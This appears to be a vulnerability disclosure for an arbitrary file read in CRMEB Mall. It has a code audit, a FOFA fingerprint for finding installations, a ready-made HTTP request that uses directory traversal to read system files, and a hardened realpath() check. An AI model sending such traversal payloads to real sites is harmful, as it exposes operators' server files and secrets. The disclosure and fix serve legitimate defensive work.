Echosssy/-CRMEB-Mall-commercial-version-of-any-file-read-vulnerability
# 众邦科技 CRMEB Mall commercial version arbitrary file read vulnerability

Source code: https://gitee.com/ZhongBangKeJi/CRMEB
Source code owner: 众邦科技 (Zhongbang Technology)

Company's official website: https://www.crmeb.com/
FOFA: icon_hash="-847565074"

## Code audit

```php
public function openfile($filepath)
{
    // root directory
    $rootDir = $this->formatPath(app()->getRootPath());
    // prevent viewing files outside the site
    if (strpos($filepath, $rootDir) === false || $filepath == '') {
        // message: 'cannot open files outside the site'
        throw new AdminException('无法打开站点以外的文件');
    }

    $filepath = $this->formatPath($filepath);
    $content = FileClass::readFile($filepath); // prevent the page from embedding a textarea tag
    $ext = FileClass::getExt($filepath);
    $encoding = mb_detect_encoding($content, mb_detect_order());
    // language types supported by the front-end component
    // ['plaintext', 'json', 'abap', 'apex', 'azcli', 'bat', 'cameligo', 'clojure', 'coffeescript', 'c', 'cpp', 'csharp', 'csp', 'css', 'dart', 'dockerfile', 'fsharp', 'go', 'graphql', 'handlebars', 'hcl', 'html', 'ini', 'java', 'javascript', 'julia', 'kotlin', 'less', 'lexon', 'lua', 'markdown', 'mips', 'msdax', 'mysql', 'objective-c', 'pascal', 'pascaligo', 'perl', 'pgsql', 'php', 'postiats', 'powerquery', 'powershell', 'pug', 'python', 'r', 'razor', 'redis', 'redshift', 'restructuredtext', 'ruby', 'rust', 'sb', 'scala', 'scheme', 'scss', 'shell', 'sol', 'aes', 'sql', 'st', 'swift', 'systemverilog', 'verilog', 'tcl', 'twig', 'typescript', 'vb', 'xml', 'yaml']

    $extarray = [
        'js' => 'javascript'
        , 'htm' => 'html'
        , 'shtml' => 'html'
        , 'html' => 'html'
        , 'xml' => 'xml'
        , 'php' => 'php'
        , 'sql' => 'mysql'
        , 'css' => 'css'
        , 'txt' => 'plaintext'
        , 'vue' => 'html'
        , 'json' => 'json'
        , 'lock' => 'json'
        , 'md' => 'markdown'
        , 'bat' => 'bat'
        , 'ini' => 'ini'
    ];
    $mode = empty($extarray[$ext]) ? 'php' : $extarray[$ext];
    return compact('content', 'mode', 'filepath', 'encoding');
}
```

The readFile() that is called simply wraps file_get_contents():

```php
public static function readFile(string $file)
{
    return @file_get_contents($file);
}
```

The vulnerable point in this code is the check that is meant to allow opening only files inside the website's root directory, but which can be bypassed with directory traversal:

```php
if (strpos($filepath, $rootDir) === false || $filepath == '') {
    throw new AdminException('无法打开站点以外的文件');
}
```

As long as the filepath string contains $rootDir anywhere, strpos() does not return false, so the check passes and other sensitive files can be reached by traversing out of the matching directory. The interface is: /adminapi/system/file/openfile

## Vulnerability reproduction

Click File management and enter the password (the password can be brute-forced).

Once inside, click on any file to edit it.

The absolute path is visible in the captured request.

The $rootDir in the code is C:\phpstudy_pro1\WWW\crmeb-master\CRMEB (it is usually supplied directly in the request the front end sends, so no brute-forcing is needed).

Construct a payload to read system.ini:

```http
GET /adminapi/system/file/openfile?filepath=C:\phpstudy_pro1\WWW\CRMEB-master\crmeb\..\..\..\..\Windows\system.ini&fileToken=a151c0055dd6ad351587ba743cd64bd0 HTTP/1.1
Host: 192.168.242.142:89
Accept: application/json, text/plain, */*
Authori-zation: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJwd2QiOiIwZmQ0Yjc1ZTA2Nzc5MjMwOTdlZThlNmQzYTdkZTQwMSIsImlzcyI6IjE5Mi4xNjguMjQyLjE0Mjo4OSIsImF1ZCI6IjE5Mi4xNjguMjQyLjE0Mjo4OSIsImlhdCI6MTcwNjk0OTQ5OCwibmJmIjoxNzA2OTQ5NDk4LCJleHAiOjE3MDk1NDE0OTgsImp0aSI6eyJpZCI6MSwidHlwZSI6ImFkbWluIn19.sz3bKZVjTcXJZAleAahllknbcQjgR-4kl9zWAJ4aybM
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Referer: http://192.168.242.142:89/admin/system/maintain/system_file/opendir
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: uuid=1; WS_ADMIN_URL=ws://192.168.242.142:89/notice; WS_CHAT_URL=ws://192.168.242.142:89/msg; cb_lang=zh-cn; PHPSESSID=7ead6c57e767cbd757d0154f40bd9bb5; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJwd2QiOiIwZmQ0Yjc1ZTA2Nzc5MjMwOTdlZThlNmQzYTdkZTQwMSIsImlzcyI6IjE5Mi4xNjguMjQyLjE0Mjo4OSIsImF1ZCI6IjE5Mi4xNjguMjQyLjE0Mjo4OSIsImlhdCI6MTcwNjk0OTQ5OCwibmJmIjoxNzA2OTQ5NDk4LCJleHAiOjE3MDk1NDE0OTgsImp0aSI6eyJpZCI6MSwidHlwZSI6ImFkbWluIn19.sz3bKZVjTcXJZAleAahllknbcQjgR-4kl9zWAJ4aybM; expires_time=1709541498; file_token=a151c0055dd6ad351587ba743cd64bd0
Connection: close
```

You can see that directory traversal succeeds because the path is not filtered.
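The root cause is that strpos() only tests whether $rootDir occurs somewhere in the string, not whether the file the path resolves to actually lives under that root. The following is an added example, not code from the CRMEB repository: it puts the vulnerable check, reduced to a boolean, next to a check that canonicalises both paths with realpath() before comparing the prefix, and runs both over a constructed temporary directory layout. The function names (vulnerableCheck, safeCheck, demo) and the directory layout are assumptions made for the illustration; the original formatPath() helper is not available here and is left out.

```php
<?php
declare(strict_types=1);

// Added example; not code from the CRMEB code base. Contrasts the substring
// check used in openfile() with a canonicalising check. Function names and
// the temp-directory layout are constructed for this demo.

// The original check reduced to a boolean: it passes whenever $rootDir occurs
// anywhere in $filepath, so "<root>/../outside.txt" is accepted.
function vulnerableCheck(string $filepath, string $rootDir): bool
{
    return !(strpos($filepath, $rootDir) === false || $filepath == '');
}

// Hardened check: canonicalise both paths with realpath(), which resolves
// "..", ".", symlinks and duplicate separators, then require the resolved
// file to lie strictly below the resolved root.
function safeCheck(string $filepath, string $rootDir): bool
{
    if ($filepath === '') {
        return false;
    }
    $root = realpath($rootDir);
    $real = realpath($filepath);
    // realpath() returns false for a path that does not exist: fail closed.
    if ($root === false || $real === false) {
        return false;
    }
    // Keep a trailing separator so a root of "/srv/site" does not match
    // "/srv/site-backup/x.txt".
    $root = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($real, $root, strlen($root)) === 0;
}

// Builds a throwaway layout under the system temp directory:
//   <base>/site/config.php    (inside the site root)
//   <base>/outside.txt        (outside it)
//   <base>/site-backup/x.txt  (a sibling whose name shares the root as prefix)
// and reports what each check decides for three candidate paths.
function demo(): array
{
    $sep  = DIRECTORY_SEPARATOR;
    $base = sys_get_temp_dir() . $sep . 'openfile_check_' . getmypid();
    $root = $base . $sep . 'site';
    mkdir($root, 0700, true);
    mkdir($base . $sep . 'site-backup', 0700);
    file_put_contents($root . $sep . 'config.php', "<?php // inside\n");
    file_put_contents($base . $sep . 'outside.txt', "not for you\n");
    file_put_contents($base . $sep . 'site-backup' . $sep . 'x.txt', "sibling\n");

    $candidates = [
        'inside'    => $root . $sep . 'config.php',
        // Same shape as the request in the write-up: the root, then "..".
        'traversal' => $root . $sep . '..' . $sep . 'outside.txt',
        'sibling'   => $root . '-backup' . $sep . 'x.txt',
    ];

    $results = [];
    foreach ($candidates as $label => $path) {
        $results[$label] = [
            'vulnerable' => vulnerableCheck($path, $root),
            'safe'       => safeCheck($path, $root),
        ];
    }

    // Remove the constructed files again.
    unlink($root . $sep . 'config.php');
    unlink($base . $sep . 'outside.txt');
    unlink($base . $sep . 'site-backup' . $sep . 'x.txt');
    rmdir($root);
    rmdir($base . $sep . 'site-backup');
    rmdir($base);

    return $results;
}

foreach (demo() as $label => $r) {
    printf(
        "%-9s vulnerable=%-5s safe=%s\n",
        $label,
        var_export($r['vulnerable'], true),
        var_export($r['safe'], true)
    );
}
```

Run it with `php check_demo.php`. The substring check accepts all three candidates, because every one of them contains the root string; the canonicalising check accepts only config.php and rejects both the traversal path and the sibling directory that merely shares the root as a prefix. Because realpath() also returns false for paths that do not exist, the hardened check fails closed on typos and probing rather than leaking an error message, and since it follows symlinks, a link inside the root that points outside it resolves outside and is denied as well.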
